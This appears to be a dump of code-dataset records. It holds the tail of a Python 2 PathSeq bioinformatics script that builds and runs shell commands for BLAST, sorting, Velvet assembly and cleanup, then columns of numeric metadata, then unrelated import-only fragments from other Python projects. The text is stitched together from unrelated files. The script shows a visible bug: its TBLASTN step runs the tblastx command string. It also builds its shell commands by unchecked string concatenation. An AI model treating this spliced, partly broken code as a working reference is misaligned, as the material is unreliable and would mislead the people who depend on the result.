print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java+ " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".tblastx.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".tblastx.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
# Sorting the file"
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".tblastx.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".tblastx.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_newlatest "
unmap=unmap + namefile
unmap=unmap + ".tblastx.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + blastx_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedtblastx.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedtblastx.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads to original file for running next round of database
copy="cp " + namefile
copy=copy + ".unmappedtblastx.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after TBLASTX Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".tblastx."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "TBLASTN":
print "TBLASTN";
# Convert the FQ1 to Fasta
fq1_2_fasta = Java + " -classpath "
fq1_2_fasta = fq1_2_fasta + PathSeq_java
fq1_2_fasta = fq1_2_fasta + " FQone2Fasta "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + " "
fq1_2_fasta = fq1_2_fasta + namefile
fq1_2_fasta = fq1_2_fasta + ".fasta"
print fq1_2_fasta
fq1_2_fasta_cmd=commands.getstatusoutput(fq1_2_fasta)
print fq1_2_fasta_cmd
tblastn=Blast_loc + "tblastn -query "
tblastn=tblastn + namefile
tblastn=tblastn + ".fasta -db \""
tblastn=tblastn + data_split[1]
tblastn=tblastn + "\" -outfmt 5 -evalue 1 -max_target_seqs 5 -num_threads "
tblastn=tblastn + nthreads
tblastn=tblastn + " -out "
tblastn=tblastn + namefile
tblastn=tblastn + ".tblastn.out"
print tblastn
tblastn_cmd=commands.getstatusoutput(tblastx)
print tblastn_cmd
# Run Blastxml
xml=Java + " -classpath "
xml=xml + PathSeq_java
xml=xml + " blastxml "
xml=xml + namefile
xml=xml + ".tblastn.out "
xml=xml + namefile
xml=xml + ".hit"
print xml
xml_cmd=commands.getstatusoutput(xml)
print xml_cmd
# create full query from the original reads and update Hit table
exqfull=Java + " -classpath "
exqfull=exqfull + PathSeq_java
exqfull=exqfull + " extractFullQuert4BHitTable "
exqfull=exqfull + namefile
exqfull=exqfull + " "
exqfull=exqfull + namefile
exqfull=exqfull + ".hit "
exqfull=exqfull + namefile
exqfull=exqfull + ".tblastn.hittable."
exqfull=exqfull + str(id_step)
exqfull=exqfull + "_"
exqfull=exqfull + str(dbindex)
print exqfull
exqfull_cmd=commands.getstatusoutput(exqfull)
print exqfull_cmd
# annotate the Hittable
annotate=Java+ " -classpath "
annotate=annotate + PathSeq_java
annotate=annotate + " annotate_hittable "
annotate=annotate + PathSeq_java
annotate=annotate + "/names.dmp "
annotate=annotate + PathSeq_java
annotate=annotate + "/nodes.dmp "
annotate=annotate + namefile
annotate=annotate + ".tblastn.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
annotate=annotate + " "
annotate=annotate + namefile
annotate=annotate + ".tblastn.annotate.hittable."
annotate=annotate + str(id_step)
annotate=annotate + "_"
annotate=annotate + str(dbindex)
print annotate
annotate_cmd=commands.getstatusoutput(annotate)
print annotate_cmd
# Sorting the file"
sort="sort +1 -2 -T " + Tmp_dir
sort=sort + " "
sort=sort + namefile
sort=sort + ".tblastn.annotate.hittable."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
sort=sort + " > "
sort=sort + namefile
sort=sort + ".tblastn.sort.tmp."
sort=sort + str(id_step)
sort=sort + "_"
sort=sort + str(dbindex)
print sort
sort_cmd=commands.getstatusoutput(sort)
print sort_cmd
# Extract unmapped reads from the Hit table
unmap=Java + " -classpath "
unmap=unmap + PathSeq_java
unmap=unmap + " extractUnmapped_newlatest "
unmap=unmap + namefile
unmap=unmap + ".tblastn.sort.tmp."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + blastx_thres
unmap=unmap + namefile
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".unmappedtblastn.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
unmap=unmap + " "
unmap=unmap + namefile
unmap=unmap + ".mappedtblastn.fq1."
unmap=unmap + str(id_step)
unmap=unmap + "_"
unmap=unmap + str(dbindex)
print unmap
unmap_cmd=commands.getstatusoutput(unmap)
print unmap_cmd
# Copy the unmapped reads to original file for running next round of database
copy="cp " + namefile
copy=copy + ".unmappedtblastn.fq1."
copy=copy + str(id_step)
copy=copy + "_"
copy=copy + str(dbindex)
copy=copy + " "
copy=copy + namefile
print copy
copy_cmd=commands.getstatusoutput(copy)
print copy_cmd
print "Statistics after TBLASTN Step"
stat="wc -l " + namefile
stat=stat + " > "
stat=stat + namefile
stat=stat + ".tblastn."
stat=stat + str(id_step)
stat=stat + "_"
stat=stat + str(dbindex)
stat=stat + ".stat"
print stat
stat_cmd=commands.getstatusoutput(stat)
print stat_cmd
elif data_split[0] == "FINISH":
print "FINISH"
b_file=namefile + ".finaloutput"
finaloutname=open(b_file,'w')
finaloutname.write("Completed the mapping on the reads")
finaloutname.close()
if compute == "STANDALONE" :
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
else:
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + full_file
count_finish = count_finish + "_*_spt/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
print count_finish_cmd[1]
if count_finish_cmd[1] == total_split:
# Convert the FQ1 to Fastq
run_concate = "python" + " "
run_concate = run_concate + PathSeq_loc
if compute == "STANDALONE" :
run_concate = run_concate + "/concat_files_standalone.py "
else:
run_concate = run_concate + "/concat_files.py "
run_concate = run_concate + namefile
run_concate = run_concate + " "
run_concate = run_concate + configfile
run_concate = run_concate + " "
run_concate = run_concate + pdir
run_concate = run_concate + " "
run_concate = run_concate + cdir
run_concate = run_concate + " "
run_concate = run_concate + id_step
run_concate = run_concate + " "
run_concate = run_concate + namefile_o
run_concate = run_concate + " "
run_concate = run_concate + mergesamjar
run_concate = run_concate + " "
run_concate = run_concate + Java
run_concate = run_concate + " "
run_concate = run_concate + Tmp_dir
run_concate = run_concate + " "
run_concate = run_concate + Samtools
print run_concate
run_concate_cmd=commands.getstatusoutput(run_concate)
print run_concate_cmd
mkdir_file = "mkdir " +pdir
mkdir_file = mkdir_file + "/"
mkdir_file = mkdir_file + "Final_combine_results"
print mkdir_file
mkdir_file_cmd=commands.getstatusoutput(mkdir_file)
print mkdir_file_cmd
cp_file = "rsync -av " + pdir
cp_file = cp_file + "/"
cp_file = cp_file + "*_PathSeq/combine_results/ "
cp_file = cp_file + pdir
cp_file = cp_file + "/"
cp_file = cp_file + "Final_combine_results/"
print cp_file
cp_file_cmd=commands.getstatusoutput(cp_file)
print cp_file_cmd
dir_results = pdir + "/"
dir_results = dir_results + "Final_combine_results"
print dir_results
os.chdir(dir_results)
dir_results = "ls -l "
print dir_results
dir_results_cmd=commands.getstatusoutput(dir_results)
print dir_results_cmd
htmlreport = Java + " -classpath "
htmlreport = htmlreport + PathSeq_java
htmlreport = htmlreport + " HTML_Report "
htmlreport = htmlreport + O_config
htmlreport = htmlreport + " "
htmlreport = htmlreport + O_inputfile
htmlreport = htmlreport + " "
htmlreport = htmlreport + pdir
htmlreport = htmlreport + "/Final_combine_results/REPORT.html"
print htmlreport
htmlreport_cmd=commands.getstatusoutput(htmlreport)
print htmlreport_cmd
elif data_split[0] == "FINISH_CLEAN":
print "FINISH CLEAN"
b_file=namefile + ".finaloutput"
finaloutname=open(b_file,'w')
finaloutname.write("Completed the mapping on the reads")
finaloutname.close()
if compute == "STANDALONE" :
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
else:
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + full_file
count_finish = count_finish + "_*_spt/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
print count_finish_cmd[1]
if count_finish_cmd[1] == total_split:
# Convert the FQ1 to Fastq
run_concate = "python" + " "
run_concate = run_concate + PathSeq_loc
if compute == "STANDALONE" :
run_concate = run_concate + "/concat_files_standalone.py "
else:
run_concate = run_concate + "/concat_files.py "
run_concate = run_concate + namefile
run_concate = run_concate + " "
run_concate = run_concate + configfile
run_concate = run_concate + " "
run_concate = run_concate + pdir
run_concate = run_concate + " "
run_concate = run_concate + cdir
run_concate = run_concate + " "
run_concate = run_concate + id_step
run_concate = run_concate + " "
run_concate = run_concate + namefile_o
run_concate = run_concate + " "
run_concate = run_concate + mergesamjar
run_concate = run_concate + " "
run_concate = run_concate + Java
run_concate = run_concate + " "
run_concate = run_concate + Tmp_dir
run_concate = run_concate + " "
run_concate = run_concate + Samtools
print run_concate
run_concate_cmd=commands.getstatusoutput(run_concate)
print run_concate_cmd
mkdir_file = "mkdir " +pdir
mkdir_file = mkdir_file + "/"
mkdir_file = mkdir_file + "Final_combine_results"
print mkdir_file
mkdir_file_cmd=commands.getstatusoutput(mkdir_file)
print mkdir_file_cmd
cp_file = "rsync -av " + pdir
cp_file = cp_file + "/"
cp_file = cp_file + "*_PathSeq/combine_results/ "
cp_file = cp_file + pdir
cp_file = cp_file + "/"
cp_file = cp_file + "Final_combine_results/"
print cp_file
cp_file_cmd=commands.getstatusoutput(cp_file)
print cp_file_cmd
dir_results = pdir + "/"
dir_results = dir_results + "Final_combine_results"
print dir_results
os.chdir(dir_results)
dir_results = "ls -l "
print dir_results
dir_results_cmd=commands.getstatusoutput(dir_results)
print dir_results_cmd
htmlreport = Java + " -classpath "
htmlreport = htmlreport + PathSeq_java
htmlreport = htmlreport + " HTML_Report "
htmlreport = htmlreport + O_config
htmlreport = htmlreport + " "
htmlreport = htmlreport + O_inputfile
htmlreport = htmlreport + " "
htmlreport = htmlreport + pdir
htmlreport = htmlreport + "/Final_combine_results/REPORT.html"
print htmlreport
htmlreport_cmd=commands.getstatusoutput(htmlreport)
print htmlreport_cmd
dir_results = pdir + "/"
print dir_results
os.chdir(dir_results)
dir_results = "ls -l "
print dir_results
dir_results_cmd=commands.getstatusoutput(dir_results)
print dir_results_cmd
rmfiles=pdir + "/clean.files"
finalout=open(rmfiles,'w')
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*_PathSeq"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "DIR "
rmd = rmd + path
finalout.write(rmd)
finalout.write("\n")
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# shutil.rmtree(path, ignore_errors=True)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.config"
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
finalout.write(rmd)
finalout.write("\n")
print rmd
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.config.current.*"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
finalout.write(rmd)
finalout.write("\n")
print rmd
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.configlst"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
finalout.write(rmd)
finalout.write("\n")
print rmd
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.command"
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
finalout.write(rmd)
finalout.write("\n")
print rmd
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.loader"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
print rmd
finalout.write(rmd)
finalout.write("\n")
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.current"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
print rmd
finalout.write(rmd)
finalout.write("\n")
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
pathseq_out=pdir + "/"
pathseq_out=pathseq_out + "*.current.*"
print pathseq_out
filelist = glob.glob(pathseq_out)
for path in filelist:
print path
rmd = Java + " -classpath "
rmd = rmd + PathSeq_java
rmd = rmd + " DeleteFolders "
rmd = rmd + "FILE "
rmd = rmd + path
print rmd
finalout.write(rmd)
finalout.write("\n")
#rmd_cmd=commands.getstatusoutput(rmd)
#print rmd_cmd
# os.remove(path)
finalout.close()
elif data_split[0] == "GATHER": # Gather steps that gathers the analyzed data
print "Completed the mapping on the reads"
b_file=namefile + ".finaloutput"
finaloutname=open(b_file,'w')
finaloutname.write("Completed the mapping on the reads")
finaloutname.close()
if compute == "STANDALONE" :
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
else:
count_finish = "ls -l " + cdir
count_finish = count_finish + "/"
count_finish = count_finish + full_file
count_finish = count_finish + "_*_spt/"
count_finish = count_finish + "*.finaloutput | "
count_finish = count_finish + "wc -l"
print count_finish
count_finish_cmd=commands.getstatusoutput(count_finish)
print count_finish_cmd
print count_finish_cmd[1]
if count_finish_cmd[1] == total_split:
print "Completed the mapping on the reads"
b_file=cdir + "/completed.txt"
if os.path.exists(b_file) :
print "Already initiated runs"
else:
finaloutname=open(b_file,'w')
finaloutname.write("C")
finaloutname.close()
# Convert the FQ1 to Fastq
run_concate = "python" + " "
run_concate = run_concate + PathSeq_loc
if compute == "STANDALONE" :
run_concate = run_concate + "/concat_files_standalone.py "
else:
run_concate = run_concate + "/concat_files.py "
run_concate = run_concate + namefile
run_concate = run_concate + " "
run_concate = run_concate + configfile
run_concate = run_concate + " "
run_concate = run_concate + pdir
run_concate = run_concate + " "
run_concate = run_concate + cdir
run_concate = run_concate + " "
run_concate = run_concate + id_step
run_concate = run_concate + " "
run_concate = run_concate + namefile_o
run_concate = run_concate + " "
run_concate = run_concate + mergesamjar
run_concate = run_concate + " "
run_concate = run_concate + Java
run_concate = run_concate + " "
run_concate = run_concate + Tmp_dir
run_concate = run_concate + " "
run_concate = run_concate + Samtools
print run_concate
run_concate_cmd=commands.getstatusoutput(run_concate)
print run_concate_cmd
new_id_step = int(id_step) + 1
cconfig = ""
newconfiglist = cdir + "/"
newconfiglist = newconfiglist + "next.configlist"
newconfiglist = newconfiglist + str(new_id_step)
foutname = open(nextconfiglist, 'r')
data_line=foutname.readlines()
foutname.close()
index=0
nfoutname = open(newconfiglist, 'w')
for no_databases2 in data_line:
line_1=no_databases2.strip()
if index == 0:
cconfig = line_1
index = index + 1
else:
nfoutname.write(line_1);
nfoutname.write("\n")
nfoutname.close()
dir_results = cdir + "/"
dir_results = dir_results + "combine_results"
print dir_results
os.chdir(dir_results)
subjob = "python" + " "
subjob = subjob + PathSeq_loc
subjob = subjob + "/"
subjob = subjob + "jobsubmission.py"
subjob = subjob + " "
subjob = subjob + namefile_o
subjob = subjob + ".unmappedfinal.fq1"
subjob = subjob + " "
subjob = subjob + cconfig
subjob = subjob + " "
subjob = subjob + newconfiglist
subjob = subjob + " "
subjob = subjob + compute
subjob = subjob + " "
subjob = subjob + pdir
subjob = subjob + " "
subjob = subjob + str(new_id_step)
subjob = subjob + " "
subjob = subjob + Institute
subjob = subjob + " "
subjob = subjob + PathSeq_loc
subjob = subjob + " "
subjob = subjob + Tmp_dir
subjob = subjob + " "
subjob = subjob + Java
subjob = subjob + " "
subjob = subjob + Bwa_loc
subjob = subjob + " "
subjob = subjob + Blast_loc
subjob = subjob + " "
subjob = subjob + Repeatmasker_loc
subjob = subjob + " "
subjob = subjob + Python
subjob = subjob + " "
subjob = subjob + Package_loader
subjob = subjob + " "
subjob = subjob + Loader_file
subjob = subjob + " "
subjob = subjob + Assembler_loc
subjob = subjob + " "
subjob = subjob + O_config
subjob = subjob + " "
subjob = subjob + O_inputfile
subjob = subjob + " "
subjob = subjob + Samtools
print "&&&&&&&&&&&&&"
print subjob
print "&&&&&&&&&&&&&"
subjob_cmd=commands.getstatusoutput(subjob)
print subjob_cmd
elif data_split[0] == "VELVET": # Velvet Assembler to run the assembly on unmapped reads
print "VELVET"
print cdir
# Convert the FQ1 to Fastq
fq1_2_fastq = Java + " -classpath "
fq1_2_fastq = fq1_2_fastq + PathSeq_java
fq1_2_fastq = fq1_2_fastq + " FQone2Fastq "
fq1_2_fastq = fq1_2_fastq + namefile
fq1_2_fastq = fq1_2_fastq + " "
fq1_2_fastq = fq1_2_fastq + namefile
fq1_2_fastq = fq1_2_fastq + ".fastq"
print fq1_2_fastq
fq1_2_fastq_cmd=commands.getstatusoutput(fq1_2_fastq)
print fq1_2_fastq_cmd
head_seq="head -1 "+namefile
if data_split[1] == "SINGLEEND":
# Convert the Velveth
Assembler = Assembler_loc + "velveth "
Assembler = Assembler + cdir
Assembler = Assembler +"/velvet_output/ "
Assembler = Assembler + hash_length
Assembler = Assembler + " "
Assembler = Assembler + " -fastq -short "
Assembler = Assembler + namefile
Assembler = Assembler + ".fastq"
print Assembler
Assembler_cmd=commands.getstatusoutput(Assembler)
print Assembler_cmd
# Convert the Velvetg
Assembler = Assembler_loc + "velvetg "
Assembler = Assembler + cdir
Assembler = Assembler + "/velvet_output/ "
Assembler = Assembler + "-min_contig_lgth "
Assembler = Assembler + minlength_contigs
print Assembler
Assembler_cmd=commands.getstatusoutput(Assembler)
print Assembler_cmd
elif data_split[1] == "PAIRED_END": # NOT ENABLED YET
# Convert the Velveth
Assembler = Assembler_loc + "velveth "
Assembler = Assembler + cdir
Assembler = Assembler +"/velvet_output/ "
Assembler = Assembler + hash_length
Assembler = Assembler + " "
Assembler = Assembler + " -fastq -shortPaired "
Assembler = Assembler + namefile
Assembler = Assembler + ".fastq"
print Assembler
Assembler_cmd=commands.getstatusoutput(Assembler)
print Assembler_cmd
# Convert the Velveth
Assembler = Assembler_loc + "velvetg "
Assembler = Assembler + cdir
Assembler = Assembler + "/velvet_output/ "
Assembler = Assembler + "-min_contig_lgth "
Assembler = Assembler + data_split[2]
print Assembler
Assembler_cmd=commands.getstatusoutput(Assembler)
print Assembler_cmd
# Copy the contigs file
contig_fq1 = Java + " -classpath "
contig_fq1 = contig_fq1 + PathSeq_java
contig_fq1 = contig_fq1 + " Fas2FQ1 "
contig_fq1 = contig_fq1 + cdir
contig_fq1 = contig_fq1 + "/velvet_output/contigs.fa "
contig_fq1 = contig_fq1 + cdir
contig_fq1 = contig_fq1 + "/"
contig_fq1 = contig_fq1 + namefile_o
contig_fq1 = contig_fq1 + ".contigs.fq1"
print contig_fq1
contigfq1_cmd=commands.getstatusoutput(contig_fq1)
print contigfq1_cmd
elif data_split[0] == "GATHERASSEMBLER":
print "Completed the mapping on the reads"
b_file=namefile + ".finaloutput"
finaloutname=open(b_file,'w')
finaloutname.write("Completed the mapping on the reads")
finaloutname.close()
print cdir
print pdir
mkdir_file = "mkdir " +cdir
mkdir_file = mkdir_file + "/"
mkdir_file = mkdir_file + "combine_results"
print mkdir_file
mkdir_file_cmd=commands.getstatusoutput(mkdir_file)
print mkdir_file_cmd
cpfile="cp " +cdir
cpfile=cpfile +"/"
cpfile=cpfile +namefile_o
cpfile=cpfile +".contigs.fq1 "
cpfile=cpfile + cdir
cpfile=cpfile + "/"
cpfile=cpfile + "combine_results"
print cpfile
cpfile_cmd=commands.getstatusoutput(cpfile)
print cpfile_cmd
new_id_step = int(id_step) + 1
cconfig = ""
newconfiglist = cdir + "/"
newconfiglist = newconfiglist + "next.configlist"
newconfiglist = newconfiglist + str(new_id_step)
foutname = open(nextconfiglist, 'r')
data_line=foutname.readlines()
foutname.close()
index=0
nfoutname = open(newconfiglist, 'w')
for no_databases2 in data_line:
line_1=no_databases2.strip()
if index == 0:
cconfig = line_1
index = index + 1
else:
nfoutname.write(line_1);
nfoutname.write("\n")
nfoutname.close()
dir_results = cdir + "/"
dir_results = dir_results + "combine_results"
print dir_results
os.chdir(dir_results)
subjob = "python" + " "
subjob = subjob + PathSeq_loc
subjob = subjob + "/"
subjob = subjob + "jobsubmission.py"
subjob = subjob + " "
subjob = subjob + namefile_o
subjob = subjob + ".contigs.fq1"
subjob = subjob + " "
subjob = subjob + cconfig
subjob = subjob + " "
subjob = subjob + newconfiglist
subjob = subjob + " "
subjob = subjob + compute
subjob = subjob + " "
subjob = subjob + pdir
subjob = subjob + " "
subjob = subjob + str(new_id_step)
subjob = subjob + " "
subjob = subjob + Institute
subjob = subjob + " "
subjob = subjob + PathSeq_loc
subjob = subjob + " "
subjob = subjob + Tmp_dir
subjob = subjob + " "
subjob = subjob + Java
subjob = subjob + " "
subjob = subjob + Bwa_loc
subjob = subjob + " "
subjob = subjob + Blast_loc
subjob = subjob + " "
subjob = subjob + Repeatmasker_loc
subjob = subjob + " "
subjob = subjob + Python
subjob = subjob + " "
subjob = subjob + Package_loader
subjob = subjob + " "
subjob = subjob + Loader_file
subjob = subjob + " "
subjob = subjob + Assembler_loc
subjob = subjob + " "
subjob = subjob + O_config
subjob = subjob + " "
subjob = subjob + O_inputfile
subjob = subjob + " "
subjob = subjob + Samtools
print "&&&&&&&&&&&&&"
print subjob
print "&&&&&&&&&&&&&"
subjob_cmd=commands.getstatusoutput(subjob)
print subjob_cmd
elif data_split[0] == "CLEAN":
clean_file = pdir + "/"
clean_file = clean_file + "Clean.cmd"
print clean_file
clean_file_cmd=commands.getstatusoutput(clean_file)
print clean_file_cmd
end_time = time.time()
timetaken= (end_time - start_time)
print "Time Taken:"
print timetaken
| 28.320539
| 138
| 0.689004
| 6,968
| 54,602
| 5.189724
| 0.051952
| 0.044798
| 0.029617
| 0.053094
| 0.852884
| 0.838062
| 0.830457
| 0.823378
| 0.818732
| 0.810298
| 0
| 0.013074
| 0.20296
| 54,602
| 1,927
| 139
| 28.335236
| 0.817854
| 0.064869
| 0
| 0.805979
| 0
| 0.00061
| 0.123027
| 0.023675
| 0.003051
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.004271
| null | null | 0.164124
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3ce6bc5ef48b530a9c423ba1f3121ce4e5a84356
| 165
|
py
|
Python
|
utilities/__init__.py
|
eaingaran/TimeMachine
|
f6199827ffc358dd32f26edd8d68e2dbf7c63a90
|
[
"MIT"
] | null | null | null |
utilities/__init__.py
|
eaingaran/TimeMachine
|
f6199827ffc358dd32f26edd8d68e2dbf7c63a90
|
[
"MIT"
] | null | null | null |
utilities/__init__.py
|
eaingaran/TimeMachine
|
f6199827ffc358dd32f26edd8d68e2dbf7c63a90
|
[
"MIT"
] | null | null | null |
from utilities import DATABASE_TYPE
from utilities import FILE_FORMAT
from utilities import Path
from utilities import RUN_MODE
from utilities import ReadWriteExcel
| 27.5
| 36
| 0.878788
| 23
| 165
| 6.173913
| 0.478261
| 0.457746
| 0.669014
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 165
| 5
| 37
| 33
| 0.97931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a735347509569e04fbca725e8d482cc504621458
| 259
|
py
|
Python
|
flanaapis/weather/__init__.py
|
AlberLC/flanaapis
|
a1124d0fc8c77b7baa459b63a789fc4b22799ee2
|
[
"MIT"
] | 1
|
2022-01-26T09:20:47.000Z
|
2022-01-26T09:20:47.000Z
|
flanaapis/weather/__init__.py
|
AlberLC/flanaapis
|
a1124d0fc8c77b7baa459b63a789fc4b22799ee2
|
[
"MIT"
] | null | null | null |
flanaapis/weather/__init__.py
|
AlberLC/flanaapis
|
a1124d0fc8c77b7baa459b63a789fc4b22799ee2
|
[
"MIT"
] | null | null | null |
from flanaapis.weather.constants import *
from flanaapis.weather.functions import *
from flanaapis.weather.google import *
from flanaapis.weather.models import *
from flanaapis.weather.open_weather_map import *
from flanaapis.weather.visual_crossing import *
| 37
| 48
| 0.837838
| 33
| 259
| 6.484848
| 0.363636
| 0.364486
| 0.560748
| 0.607477
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092664
| 259
| 6
| 49
| 43.166667
| 0.910638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
599ca9e0ddb1ff669f62fe3edfecc595dbb1e45a
| 14,611
|
py
|
Python
|
src/core/models/text_graph.py
|
yuanqidu/IDGL
|
64d2d73289ca0f6dcab966062d4cb15844236b37
|
[
"Apache-2.0"
] | 153
|
2019-12-22T07:26:10.000Z
|
2022-03-29T02:03:18.000Z
|
src/core/models/text_graph.py
|
yuanqidu/IDGL
|
64d2d73289ca0f6dcab966062d4cb15844236b37
|
[
"Apache-2.0"
] | 17
|
2020-01-14T15:20:26.000Z
|
2022-01-23T06:06:03.000Z
|
src/core/models/text_graph.py
|
yuanqidu/IDGL
|
64d2d73289ca0f6dcab966062d4cb15844236b37
|
[
"Apache-2.0"
] | 21
|
2020-07-27T00:58:37.000Z
|
2022-02-02T01:47:37.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..layers.graphlearn import GraphLearner, get_binarized_kneighbors_graph
